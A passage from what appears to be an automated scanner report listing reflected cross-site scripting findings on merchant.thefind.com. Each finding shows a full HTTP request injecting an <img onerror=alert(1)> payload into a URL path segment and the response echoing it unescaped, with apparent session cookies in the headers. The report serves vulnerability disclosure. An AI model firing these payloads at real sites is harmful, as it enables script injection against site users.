The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55d72<img%20src%3da%20onerror%3dalert(1)>9625c7b25c9 was submitted in the REST URL parameter 1. This input was echoed as 55d72<img src=a onerror=alert(1)>9625c7b25c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts55d72<img%20src%3da%20onerror%3dalert(1)>9625c7b25c9/mc/prototype.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 210
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"prototype","fullname":"scripts55d72<img src=a onerror=alert(1)>9625c7b25c9.mc.prototype","path":".","type":"missing","components":null,"payload":""}}

1.52. https://merchant.thefind.com/scripts/mc/prototype.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/prototype.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9df7<img%20src%3da%20onerror%3dalert(1)>434e2f5208a was submitted in the REST URL parameter 2. This input was echoed as e9df7<img src=a onerror=alert(1)>434e2f5208a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mce9df7<img%20src%3da%20onerror%3dalert(1)>434e2f5208a/prototype.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:10 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 210
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"prototype","fullname":"scripts.mce9df7<img src=a onerror=alert(1)>434e2f5208a.prototype","path":".","type":"missing","components":null,"payload":""}}

1.53. https://merchant.thefind.com/scripts/mc/prototype.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/prototype.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b51fa<img%20src%3da%20onerror%3dalert(1)>a30505180cb was submitted in the REST URL parameter 3. This input was echoed as b51fa<img src=a onerror=alert(1)>a30505180cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/mc/b51fa<img%20src%3da%20onerror%3dalert(1)>a30505180cb HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:01 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9548

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.mc.b51fa<img src=a onerror=alert(1)>a30505180cb]
</div>
...[SNIP]...

1.54. https://merchant.thefind.com/scripts/tplmgr/tplmgr.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/tplmgr/tplmgr.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61fdd<img%20src%3da%20onerror%3dalert(1)>73e37773399 was submitted in the REST URL parameter 1. This input was echoed as 61fdd<img src=a onerror=alert(1)>73e37773399 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts61fdd<img%20src%3da%20onerror%3dalert(1)>73e37773399/tplmgr/tplmgr.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:18 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 208
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"tplmgr","fullname":"scripts61fdd<img src=a onerror=alert(1)>73e37773399.tplmgr.tplmgr","path":".","type":"missing","components":null,"payload":""}}

1.55. https://merchant.thefind.com/scripts/tplmgr/tplmgr.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/tplmgr/tplmgr.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 44cec<img%20src%3da%20onerror%3dalert(1)>6283ce1a552 was submitted in the REST URL parameter 2. This input was echoed as 44cec<img src=a onerror=alert(1)>6283ce1a552 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/tplmgr44cec<img%20src%3da%20onerror%3dalert(1)>6283ce1a552/tplmgr.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:33 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 208
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"tplmgr","fullname":"scripts.tplmgr44cec<img src=a onerror=alert(1)>6283ce1a552.tplmgr","path":".","type":"missing","components":null,"payload":""}}

1.56. https://merchant.thefind.com/scripts/tplmgr/tplmgr.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/tplmgr/tplmgr.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b3ca<img%20src%3da%20onerror%3dalert(1)>e00d69ad72b was submitted in the REST URL parameter 3. This input was echoed as 7b3ca<img src=a onerror=alert(1)>e00d69ad72b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/tplmgr/7b3ca<img%20src%3da%20onerror%3dalert(1)>e00d69ad72b HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:50 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9552

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.tplmgr.7b3ca<img src=a onerror=alert(1)>e00d69ad72b]
</div>
...[SNIP]...

1.57. https://merchant.thefind.com/scripts/ui/infobox.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/ui/infobox.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c86f3<img%20src%3da%20onerror%3dalert(1)>835913b09e3 was submitted in the REST URL parameter 1. This input was echoed as c86f3<img src=a onerror=alert(1)>835913b09e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scriptsc86f3<img%20src%3da%20onerror%3dalert(1)>835913b09e3/ui/infobox.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:11 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 206
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"infobox","fullname":"scriptsc86f3<img src=a onerror=alert(1)>835913b09e3.ui.infobox","path":".","type":"missing","components":null,"payload":""}}

1.58. https://merchant.thefind.com/scripts/ui/infobox.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/ui/infobox.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c68bc<img%20src%3da%20onerror%3dalert(1)>8960e6acabd was submitted in the REST URL parameter 2. This input was echoed as c68bc<img src=a onerror=alert(1)>8960e6acabd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/uic68bc<img%20src%3da%20onerror%3dalert(1)>8960e6acabd/infobox.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:01 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 206
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"infobox","fullname":"scripts.uic68bc<img src=a onerror=alert(1)>8960e6acabd.infobox","path":".","type":"missing","components":null,"payload":""}}

1.59. https://merchant.thefind.com/scripts/ui/infobox.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/ui/infobox.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbcfb<img%20src%3da%20onerror%3dalert(1)>938c69adb6c was submitted in the REST URL parameter 3. This input was echoed as dbcfb<img src=a onerror=alert(1)>938c69adb6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/ui/dbcfb<img%20src%3da%20onerror%3dalert(1)>938c69adb6c HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:52 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9548

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.ui.dbcfb<img src=a onerror=alert(1)>938c69adb6c]
</div>
...[SNIP]...

1.60. https://merchant.thefind.com/scripts/utils/ajaxlib.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e33ab<img%20src%3da%20onerror%3dalert(1)>daec57be500 was submitted in the REST URL parameter 1. This input was echoed as e33ab<img src=a onerror=alert(1)>daec57be500 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scriptse33ab<img%20src%3da%20onerror%3dalert(1)>daec57be500/utils/ajaxlib.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:29 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 209
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"ajaxlib","fullname":"scriptse33ab<img src=a onerror=alert(1)>daec57be500.utils.ajaxlib","path":".","type":"missing","components":null,"payload":""}}

1.61. https://merchant.thefind.com/scripts/utils/ajaxlib.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4268<img%20src%3da%20onerror%3dalert(1)>ccebe615b53 was submitted in the REST URL parameter 2. This input was echoed as d4268<img src=a onerror=alert(1)>ccebe615b53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utilsd4268<img%20src%3da%20onerror%3dalert(1)>ccebe615b53/ajaxlib.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:47 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 209
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"ajaxlib","fullname":"scripts.utilsd4268<img src=a onerror=alert(1)>ccebe615b53.ajaxlib","path":".","type":"missing","components":null,"payload":""}}

1.62. https://merchant.thefind.com/scripts/utils/ajaxlib.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e18f5<img%20src%3da%20onerror%3dalert(1)>fc1f8623cd3 was submitted in the REST URL parameter 3. This input was echoed as e18f5<img src=a onerror=alert(1)>fc1f8623cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils/e18f5<img%20src%3da%20onerror%3dalert(1)>fc1f8623cd3 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:18 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9551

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
